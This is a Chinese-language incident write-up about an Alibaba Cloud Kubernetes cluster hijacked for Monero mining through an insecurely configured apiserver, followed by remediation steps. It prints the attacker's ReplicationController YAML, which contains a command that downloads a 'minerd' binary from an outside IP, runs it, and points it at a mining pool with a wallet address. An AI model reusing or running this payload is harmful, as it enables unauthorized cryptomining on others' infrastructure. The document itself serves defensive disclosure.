阿里云kubernetes被minerd挖矿入侵
阿里云kubernetes被minerd挖矿入侵
# kubectl get rc mysql1 -o yaml
apiVersion: v1
kind: ReplicationController
metadata:
creationTimestamp: 2017-09-07T07:21:43Z
generation: 1
labels:
app: mysql1
name: mysql1
namespace: default
resourceVersion: "12180788"
selfLink: /api/v1/namespaces/default/replicationcontrollers/mysql1
uid: 33118df0-939d-11e7-bd2a-00163e088d17
spec:
replicas: 5
selector:
app: mysql1
template:
metadata:
creationTimestamp: null
labels:
app: mysql1
spec:
containers:
- command:
- sh
- -c
- curl -L http://172.104.190.64:8220/minerd -o minerd;chmod 777 minerd &&
setsid ./minerd -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333
-u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo
-p x
image: centos
imagePullPolicy: Always
name: mysql1
resources: {}
terminationMessagePath: /dev/termination-log
dnsPolicy: ClusterFirst
restartPolicy: Always
securityContext: {}
terminationGracePeriodSeconds: 30
volumes:
- emptyDir: {}
name: shared-data
status:
availableReplicas: 4
fullyLabeledReplicas: 5
observedGeneration: 1
readyReplicas: 4
replicas: 5
原因是由于Kubernetes Apiserver不安全配置所致,Apiserver提供了资源操作的唯一入口,并提供认证、授权、访问控制、API注册和发现等机制,所以apiserver的安全至关重要。
解决方法步骤
1,删除相关rc,命令如下
kubectl delete rc mysql1
2,设置非安全端口 8080 限制只能本机访问
# vi /etc/kubernetes/apiserver KUBE_API_ADDRESS="--insecure-bind-address=127.0.0.1"
3,安全端口6443使用双向ssl认证访问,authorization-mode=ABAC,服务器和客户端证书生成浏览
/etc/kubernetes/apiserver配置
KUBE_API_ARGS="--client-ca-file=/etc/kubernetes/ca.crt --tls-cert-file=/etc/kubernetes/server.crt --tls-private-key-file=/etc/kubernetes/server.key --authorization-mode=ABAC --authorization_policy_file=/etc/kubernetes/authorizationpolicy.txt --enable-swagger-ui=true"
authorizationpolicy.txt授权配置
{"user":"kubeadmin","readonly": false}
参考资料
https://www.kubernetes.org.cn/1995.html
https://www.kubernetes.org.cn/1865.html
https://kubernetes.io/docs/admin/authentication/#appendix
